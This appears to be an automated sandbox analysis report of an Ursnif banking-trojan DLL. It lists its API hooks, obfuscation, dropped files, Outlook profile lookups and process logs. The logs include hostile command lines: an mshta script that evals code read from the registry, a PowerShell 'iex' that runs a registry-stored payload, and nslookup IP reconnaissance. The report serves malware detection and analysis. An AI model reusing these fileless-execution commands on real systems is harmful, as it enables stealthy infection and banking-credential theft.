Source: C:\Windows\explorer.exe	Code function: 29_2_03B5CCA0 NtReadVirtualMemory,	29_2_03B5CCA0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B91004 NtProtectVirtualMemory,NtProtectVirtualMemory,	29_2_03B91004

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02812F65 CreateProcessAsUserW,

0_2_02812F65

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA22A4	0_2_73CA22A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_028262B9	0_2_028262B9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281A235	0_2_0281A235
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282F9C9	0_2_0282F9C9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_028191D8	0_2_028191D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0281DE6E	0_2_0281DE6E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02836F28	0_2_02836F28
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02829F48	0_2_02829F48
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02821481	0_2_02821481
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02817CF0	0_2_02817CF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282BDD5	0_2_0282BDD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0282C53B	0_2_0282C53B
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FC164	26_2_001FC164
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FA4BC	26_2_001FA4BC
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F676C	26_2_001F676C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D203C	26_2_001D203C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F0034	26_2_001F0034
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EB040	26_2_001EB040
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F6064	26_2_001F6064
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FE080	26_2_001FE080
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F20F8	26_2_001F20F8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E9138	26_2_001E9138
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DC134	26_2_001DC134
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FF940	26_2_001FF940
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E1174	26_2_001E1174
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F91A0	26_2_001F91A0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F3208	26_2_001F3208
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F8224	26_2_001F8224
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D7320	26_2_001D7320
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D8B5C	26_2_001D8B5C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E8B4C	26_2_001E8B4C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E9380	26_2_001E9380
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D2BC8	26_2_001D2BC8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DD460	26_2_001DD460
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F94B8	26_2_001F94B8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E9CB0	26_2_001E9CB0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001ED4A8	26_2_001ED4A8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F74CC	26_2_001F74CC
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E0CC0	26_2_001E0CC0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DBCF8	26_2_001DBCF8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E3CE0	26_2_001E3CE0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FB516	26_2_001FB516
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D6D08	26_2_001D6D08
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E452C	26_2_001E452C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EB520	26_2_001EB520
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E1D94	26_2_001E1D94
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DAE04	26_2_001DAE04
Source: C:\Windows\System32\control.exe	Code function: 26_2_001F26B4	26_2_001F26B4
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FBEB0	26_2_001FBEB0
Source: C:\Windows\System32\control.exe	Code function: 26_2_001DB75C	26_2_001DB75C
Source: C:\Windows\System32\control.exe	Code function: 26_2_001EF770	26_2_001EF770
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D9F98	26_2_001D9F98
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D37B8	26_2_001D37B8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001E17B8	26_2_001E17B8
Source: C:\Windows\System32\control.exe	Code function: 26_2_001FAFB8	26_2_001FAFB8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B791A0	29_2_03B791A0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5C134	29_2_03B5C134
Source: C:\Windows\explorer.exe	Code function: 29_2_03B69138	29_2_03B69138
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7C164	29_2_03B7C164
Source: C:\Windows\explorer.exe	Code function: 29_2_03B70034	29_2_03B70034
Source: C:\Windows\explorer.exe	Code function: 29_2_03B537B8	29_2_03B537B8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7AFB8	29_2_03B7AFB8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6F770	29_2_03B6F770
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7676C	29_2_03B7676C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5B75C	29_2_03B5B75C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B61D94	29_2_03B61D94
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7A4BC	29_2_03B7A4BC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B69380	29_2_03B69380
Source: C:\Windows\explorer.exe	Code function: 29_2_03B52BC8	29_2_03B52BC8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B57320	29_2_03B57320
Source: C:\Windows\explorer.exe	Code function: 29_2_03B58B5C	29_2_03B58B5C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B68B4C	29_2_03B68B4C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B78224	29_2_03B78224
Source: C:\Windows\explorer.exe	Code function: 29_2_03B73208	29_2_03B73208
Source: C:\Windows\explorer.exe	Code function: 29_2_03B61174	29_2_03B61174
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7F940	29_2_03B7F940
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7E080	29_2_03B7E080
Source: C:\Windows\explorer.exe	Code function: 29_2_03B720F8	29_2_03B720F8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5203C	29_2_03B5203C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B76064	29_2_03B76064
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6B040	29_2_03B6B040
Source: C:\Windows\explorer.exe	Code function: 29_2_03B617B8	29_2_03B617B8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B59F98	29_2_03B59F98
Source: C:\Windows\explorer.exe	Code function: 29_2_03B726B4	29_2_03B726B4
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7BEB0	29_2_03B7BEB0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5AE04	29_2_03B5AE04
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6B520	29_2_03B6B520
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6452C	29_2_03B6452C
Source: C:\Windows\explorer.exe	Code function: 29_2_03B7B516	29_2_03B7B516
Source: C:\Windows\explorer.exe	Code function: 29_2_03B56D08	29_2_03B56D08
Source: C:\Windows\explorer.exe	Code function: 29_2_03B69CB0	29_2_03B69CB0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B794B8	29_2_03B794B8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B6D4A8	29_2_03B6D4A8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5BCF8	29_2_03B5BCF8
Source: C:\Windows\explorer.exe	Code function: 29_2_03B63CE0	29_2_03B63CE0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B60CC0	29_2_03B60CC0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B774CC	29_2_03B774CC
Source: C:\Windows\explorer.exe	Code function: 29_2_03B55474	29_2_03B55474
Source: C:\Windows\explorer.exe	Code function: 29_2_03B5D460	29_2_03B5D460

PE file does not import any functions

Source: 3he3buld.dll.25.dr	Static PE information: No import functions for PE file found
Source: l4vfe2li.dll.22.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Tries to load missing DLLs

Source: C:\Windows\System32\loaddll32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe	Section loaded: msoert2.dll

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@32/37@11/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02813861 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

0_2_02813861

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E7B188DA-2B5F-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{52C0E7AB-8963-5497-A3A6-CDC8873A517C}
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C2534899-3980-442C-D316-7DB8B7AA016C}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{CAC73C9B-A194-8CA5-7B9E-6580DFB269B4}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA6B98D9B8879D55E.TMP

Jump to behavior

Source: earmarkavchd.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: earmarkavchd.dll

ReversingLabs: Detection: 45%

Source: loaddll32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\earmarkavchd.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000016.00000002.337592286.0000021CA1E30000.00000002.00000001.sdmp, csc.exe, 00000019.00000002.351200825.0000025155AB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.383918112.0000000007190000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.349184044.00000000043A0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.349184044.00000000043A0000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 0000001A.00000002.407242943.0000020E4C1DC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 0000001A.00000002.407242943.0000020E4C1DC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.383918112.0000000007190000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))			Jump to behavior

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0281DB26 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

0_2_0281DB26

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA2240 push ecx; ret	0_2_73CA2249
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73CA2293 push ecx; ret	0_2_73CA22A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02836BB0 push ecx; ret	0_2_02836BB9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02836F17 push ecx; ret	0_2_02836F27
Source: C:\Windows\System32\control.exe	Code function: 26_2_001D4DCD push 3B000001h; retf	26_2_001D4DD2
Source: C:\Windows\explorer.exe	Code function: 29_2_03B54DCD push 3B000001h; retf	29_2_03B54DD2

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\explorer.exe

